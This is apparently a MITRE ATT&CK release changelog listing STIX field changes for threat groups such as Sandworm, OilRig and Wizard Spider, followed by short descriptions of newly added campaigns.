modified | 2022-10-12 20:11:40.313000+00:00 | 2023-03-08 22:12:31.238000+00:00
external_references[5]['source_name'] | BlackEnergy (Group) | IRIDIUM
external_references[5]['description'] | (Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: Microsoft Prestige ransomware October 2022)
external_references[6]['source_name'] | Telebots | BlackEnergy (Group)
external_references[6]['description'] | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name'] | IRON VIKING | Telebots
external_references[7]['description'] | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name'] | US District Court Indictment GRU Oct 2018 | IRON VIKING
external_references[8]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[9]['source_name'] | Dragos ELECTRUM | US District Court Indictment GRU Oct 2018
external_references[9]['description'] | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[9]['url'] | https://www.dragos.com/resource/electrum/ | https://www.justice.gov/opa/page/file/1098481/download
external_references[10]['source_name'] | F-Secure BlackEnergy 2014 | Dragos ELECTRUM
external_references[10]['description'] | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[10]['url'] | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf | https://www.dragos.com/resource/electrum/
external_references[11]['source_name'] | iSIGHT Sandworm 2014 | F-Secure BlackEnergy 2014
external_references[11]['description'] | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[12]['source_name'] | CrowdStrike VOODOO BEAR | iSIGHT Sandworm 2014
external_references[12]['description'] | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[12]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[13]['source_name'] | InfoSecurity Sandworm Oct 2014 | CrowdStrike VOODOO BEAR
external_references[13]['description'] | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[13]['url'] | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[14]['source_name'] | NCSC Sandworm Feb 2020 | Microsoft Prestige ransomware October 2022
external_references[14]['description'] | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. | MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.
external_references[14]['url'] | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory | https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
external_references[15]['source_name'] | USDOJ Sandworm Feb 2020 | InfoSecurity Sandworm Oct 2014
external_references[15]['description'] | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[15]['url'] | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[16]['source_name'] | US District Court Indictment GRU Unit 74455 October 2020 | NCSC Sandworm Feb 2020
external_references[16]['description'] | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[16]['url'] | https://www.justice.gov/opa/press-release/file/1328521/download | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[17]['source_name'] | Secureworks IRON VIKING  | USDOJ Sandworm Feb 2020
external_references[17]['description'] | Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[17]['url'] | https://www.secureworks.com/research/threat-profiles/iron-viking | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[18]['source_name'] | UK NCSC Olympic Attacks October 2020 | US District Court Indictment GRU Unit 74455 October 2020
external_references[18]['description'] | UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[18]['url'] | https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games | https://www.justice.gov/opa/press-release/file/1328521/download
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.2 | 3.0
iterable_item_added
STIX Field | Old value | New value
aliases | | IRIDIUM
external_references | | {'source_name': 'Secureworks IRON VIKING ', 'description': 'Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-viking'}
external_references | | {'source_name': 'UK NCSC Olympic Attacks October 2020', 'description': 'UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.', 'url': 'https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games'}
Minor Version Changes

[G0037] FIN6

Current version: 3.3

Version changed from: 3.2 → 3.3

Details
values_changed
STIX Field | Old value | New value
modified | 2022-06-02 20:11:01.957000+00:00 | 2023-03-22 03:50:17.471000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 3.2 | 3.3

[G0046] FIN7

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-07-20 20:06:44.706000+00:00 | 2023-03-22 03:51:04.185000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.1 | 2.2

[G1001] HEXANE

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-08-31 22:16:30.454000+00:00 | 2023-03-22 04:43:59.082000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_domains[0] | ics-attack | enterprise-attack
x_mitre_domains[1] | enterprise-attack | ics-attack
x_mitre_version | 2.0 | 2.1

[G0032] Lazarus Group

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-08-23 15:30:44.196000+00:00 → 2023-03-30 19:01:41.451000+00:00
external_references[6]['url']: https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/ → https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.1 → 3.2

[G0049] OilRig

Current version: 3.1

Version changed from: 3.0 → 3.1


Old Description:
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

New Description:
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

Details
dictionary_item_added
STIX Field: New Value
external_references: https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
dictionary_item_removed
STIX Field: Old value
external_references: https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_references: https://pan-unit42.github.io/playbook_viewer/
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 20:18:52.733000+00:00 → 2023-02-06 20:58:52.317000+00:00
description: [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) → [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
external_references[5]['source_name']: Check Point APT34 April 2021 → Evasive Serpens
external_references[5]['description']: Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. → (Citation: Unit42 OilRig Playbook 2023)
external_references[6]['source_name']: ClearSky OilRig Jan 2017 → Check Point APT34 April 2021
external_references[6]['description']: ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017. → Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
external_references[6]['url']: http://www.clearskysec.com/oilrig/ → https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_references[7]['source_name']: Palo Alto OilRig May 2016 → ClearSky OilRig Jan 2017
external_references[7]['description']: Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. → ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
external_references[7]['url']: http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ → http://www.clearskysec.com/oilrig/
external_references[8]['source_name']: Palo Alto OilRig April 2017 → Palo Alto OilRig May 2016
external_references[8]['description']: Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017. → Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
external_references[8]['url']: http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ → http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
external_references[9]['source_name']: Palo Alto OilRig Oct 2016 → Palo Alto OilRig April 2017
external_references[9]['description']: Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017. → Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
external_references[9]['url']: http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/ → http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
external_references[10]['source_name']: Unit 42 QUADAGENT July 2018 → Palo Alto OilRig Oct 2016
external_references[10]['description']: Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. → Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
external_references[10]['url']: https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ → http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
external_references[11]['source_name']: Crowdstrike Helix Kitten Nov 2018 → Unit 42 QUADAGENT July 2018
external_references[11]['description']: Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. → Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
external_references[11]['url']: https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ → https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
external_references[12]['source_name']: FireEye APT34 Dec 2017 → Crowdstrike Helix Kitten Nov 2018
external_references[12]['description']: Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. → Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
external_references[12]['url']: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html → https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
external_references[13]['source_name']: Secureworks COBALT GYPSY Threat Profile → FireEye APT34 Dec 2017
external_references[13]['description']: Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021. → Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
external_references[13]['url']: https://www.secureworks.com/research/threat-profiles/cobalt-gypsy → https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
external_references[14]['source_name']: APT34 → Secureworks COBALT GYPSY Threat Profile
external_references[14]['description']: This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021) → Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.
external_references[15]['source_name']: Unit 42 Playbook Dec 2017 → APT34
external_references[15]['description']: Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. → This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.0 → 3.1
iterable_item_added
STIX Field: New Value
aliases: Evasive Serpens
external_references: {'source_name': 'Unit 42 Playbook Dec 2017', 'description': 'Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.', 'url': 'https://pan-unit42.github.io/playbook_viewer/'}
external_references: {'source_name': 'Unit42 OilRig Playbook 2023', 'description': 'Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.', 'url': 'https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens'}

[G0102] Wizard Spider

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-14 17:27:41.194000+00:00 → 2023-03-22 05:44:27.289000+00:00
external_references[1]['source_name']: UNC1878 → Grim Spider
external_references[1]['description']: (Citation: FireEye KEGTAP SINGLEMALT October 2020) → (Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)
external_references[2]['source_name']: TEMP.MixMaster → UNC1878
external_references[2]['description']: (Citation: FireEye Ryuk and Trickbot January 2019) → (Citation: FireEye KEGTAP SINGLEMALT October 2020)
external_references[3]['source_name']: Grim Spider → TEMP.MixMaster
external_references[3]['description']: (Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019) → (Citation: FireEye Ryuk and Trickbot January 2019)
external_references[4]['source_name']: CrowdStrike Ryuk January 2019 → DHS/CISA Ransomware Targeting Healthcare October 2020
external_references[4]['description']: Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. → DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.
external_references[4]['url']: https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ → https://us-cert.cisa.gov/ncas/alerts/aa20-302a
external_references[5]['source_name']: DHS/CISA Ransomware Targeting Healthcare October 2020 → FireEye Ryuk and Trickbot January 2019
external_references[5]['description']: DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020. → Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.
external_references[5]['url']: https://us-cert.cisa.gov/ncas/alerts/aa20-302a → https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
external_references[6]['source_name']: CrowdStrike Wizard Spider October 2020 → CrowdStrike Ryuk January 2019
external_references[6]['description']: Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. → Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
external_references[6]['url']: https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ → https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
external_references[7]['source_name']: FireEye KEGTAP SINGLEMALT October 2020 → CrowdStrike Grim Spider May 2019
external_references[7]['description']: Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020. → John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
external_references[7]['url']: https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html → https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/
external_references[8]['source_name']: FireEye Ryuk and Trickbot January 2019 → FireEye KEGTAP SINGLEMALT October 2020
external_references[8]['description']: Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020. → Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.
external_references[8]['url']: https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html → https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
external_references[9]['source_name']: CrowdStrike Grim Spider May 2019 → CrowdStrike Wizard Spider October 2020
external_references[9]['description']: John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. → Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[9]['url']: https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/ → https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
x_mitre_version: 2.0 → 2.1
Patches

[G0064] APT33

Current version: 1.4

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-05-23 21:22:08.170000+00:00 → 2023-03-08 22:07:25.123000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[G0035] Dragonfly

Current version: 3.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-19 22:09:02.443000+00:00 → 2023-03-08 22:03:28.170000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[G0088] TEMP.Veles

Current version: 1.3

Details
dictionary_item_removed
STIX Field: Old value
external_references: https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
values_changed
STIX Field: Old value → New Value
modified: 2022-05-24 16:22:20.856000+00:00 → 2022-11-30 22:46:40.135000+00:00
external_references[3]['url']: "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html " → "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" (trailing space removed)
external_references[4]['source_name']: FireEye TEMP.Veles 2018 → FireEye TRITON 2019
external_references[4]['description']: FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. → Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
external_references[4]['url']: https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html → https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
external_references[5]['source_name']: FireEye TRITON 2019 → FireEye TEMP.Veles JSON April 2019
external_references[5]['description']: Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. → Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.
external_references[5]['url']: https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html → https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
external_references[6]['source_name']: FireEye TEMP.Veles JSON April 2019 → Pylos Xenotime 2019
external_references[6]['description']: Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019. → Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.
external_references[6]['url']: https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html → https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
external_references[7]['source_name']: Pylos Xenotime 2019 → XENOTIME
external_references[7]['description']: Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019. → The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
iterable_item_removed
STIX Field: Old value
external_references: {'source_name': 'XENOTIME', 'description': 'The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )'}

Campaigns

enterprise-attack

New Campaigns

[C0025] 2016 Ukraine Electric Power Attack

Current version: 1.0

Description: [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)


[C0017] C0017

Current version: 1.0

Description: [C0017](https://attack.mitre.org/campaigns/C0017) was an [APT41](https://attack.mitre.org/groups/G0096) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://attack.mitre.org/campaigns/C0017) are unknown, however [APT41](https://attack.mitre.org/groups/G0096) was observed exfiltrating Personal Identifiable Information (PII).(Citation: Mandiant APT41)


[C0018] C0018

Current version: 1.0

Description: [C0018](https://attack.mitre.org/campaigns/C0018) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://attack.mitre.org/software/S1053) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://attack.mitre.org/software/S1053).(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)


[C0021] C0021

Current version: 1.0

Description: [C0021](https://attack.mitre.org/campaigns/C0021) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://attack.mitre.org/campaigns/C0021)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://attack.mitre.org/groups/G0016) activity.(Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye APT29 Nov 2018)


[C0022] Operation Dream Job

Current version: 1.0

Description: [Operation Dream Job](https://attack.mitre.org/campaigns/C0022) was a cyber espionage operation likely conducted by [Lazarus Group](https://attack.mitre.org/groups/G0032) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://attack.mitre.org/campaigns/C0022) as an umbrella term covering both Operation Interception and Operation North Star.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: The Hacker News Lazarus Aug 2022)


[C0023] Operation Ghost

Current version: 1.0

